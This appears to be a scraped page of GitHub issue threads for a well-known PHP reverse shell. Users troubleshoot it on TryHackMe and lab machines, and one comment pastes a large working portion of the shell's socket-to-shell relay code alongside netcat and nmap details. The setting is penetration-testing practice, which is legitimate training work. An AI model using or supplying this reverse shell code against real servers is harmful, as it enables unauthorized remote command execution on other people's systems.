pentestmonkey / php-reverse-shell Goto Github PK
View Code? Open in Web Editor NEWLicense: GNU General Public License v2.0
License: GNU General Public License v2.0
shell listening problame do not work this shell
I get this when I run this on a TryHackMe server.
Hello everyone
I have a problem when a try to connect a reverse shell with the php reverse shell from
https://github.com/pentestmonkey/php-reverse-shell
I'm using a local kali linux installed in virtual machine in VMWARE in my laptop
the IP of my kali is the following 192.168.86.2
I'm trying to resolve the machine vulnversity of TRYHACKME this is the IP that I had from TRYHACKE this time
I start first the listener in my local kali linux in port 4444
this is my configuration in the php reverse shell code
but when a upload the shell to the server machine and try to execute the file this fails
please someone can help me, this error only occurs when I try a reverse shell in TRYHACKME machines, because when I try another machines downloaded from vulnhub or another resources in local this works fine
I dont know why just with this platform
thanks in advanced
I am running windows 7 and when I uploaded the reverse shell on the site it always gives the error of, daemonize wasn't completed. But running it on an attack box (I was doing the coldbox challenge on tryhackme). It works, any way to fix this or do I just use a Linux based system.
Hi you man,
I think you should change
function printit ($string) {
if ($!daemon) {
print "$string\n";
}
}
with
function printit ($string) {
if (isset($daemon)) {
print "$string\n";
}
}
I don't understand why but it's don't work. At page:
array("pipe", "r"), // stdin is a pipe that the child will read from 1 => array("pipe", "w"), // stdout is a pipe that the child will write to 2 => array("pipe", "w") // stderr is a pipe that the child will write to ); $process = proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit("ERROR: Can't spawn shell"); exit(1); } // Set everything to non-blocking // Reason: Occsionally reads will block, even though stream_select tells us they won't stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit("Successfully opened reverse shell to $ip:$port"); while (1) { if (feof($sock)) { printit("ERROR: Shell connection terminated"); break; } if (feof($pipes[1])) { printit("ERROR: Shell process terminated"); break; } $read_a = array($sock, $pipes[1], $pipes[2]); $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit("SOCK READ"); $input = fread($sock, $chunk_size); if ($debug) printit("SOCK: $input"); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit("STDOUT READ"); $input = fread($pipes[1], $chunk_size); if ($debug) printit("STDOUT: $input"); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit("STDERR READ"); $input = fread($pipes[2], $chunk_size); if ($debug) printit("STDERR: $input"); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print "$string\n"; } } ?>
Hi. I'm trying this out on my own CentOS server. I used nmap to scan for open ports, I got this result:
Discovered open port 21/tcp on xxx.xx.xx.xxx
Discovered open port 143/tcp on xxx.xx.xx.xxx
Discovered open port 993/tcp on xxx.xx.xx.xxx
Discovered open port 110/tcp on xxx.xx.xx.xxx
Discovered open port 587/tcp on xxx.xx.xx.xxx
Discovered open port 995/tcp on xxx.xx.xx.xxx
Discovered open port 3306/tcp on xxx.xx.xx.xxx
Discovered open port 443/tcp on xxx.xx.xx.xxx
Discovered open port 25/tcp on xxx.xx.xx.xxx
Discovered open port 80/tcp on xxx.xx.xx.xxx
Discovered open port 465/tcp on xxx.xx.xx.xxx
Then I used netcat to listen to a port and modifed php file to communicate on that port and visited the url. Here's what I get for ports like 1234, 4444, etc.
WARNING: Failed to daemonise. This is quite common and not fatal.
Warning: fsockopen(): unable to connect to 198.46.87.211:4444 (Connection refused) in /home/xxxxxx/public_html/php-reverse-shell.php on line 100
Connection refused (111)
And when I try an open port like 3306, I get this:
WARNING: Failed to daemonise. This is quite common and not fatal. Successfully opened reverse shell to 198.46.87.211:3306 ERROR: Shell connection terminated
But I'm not getting anything on netcat in either case. What am I doing wrong?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.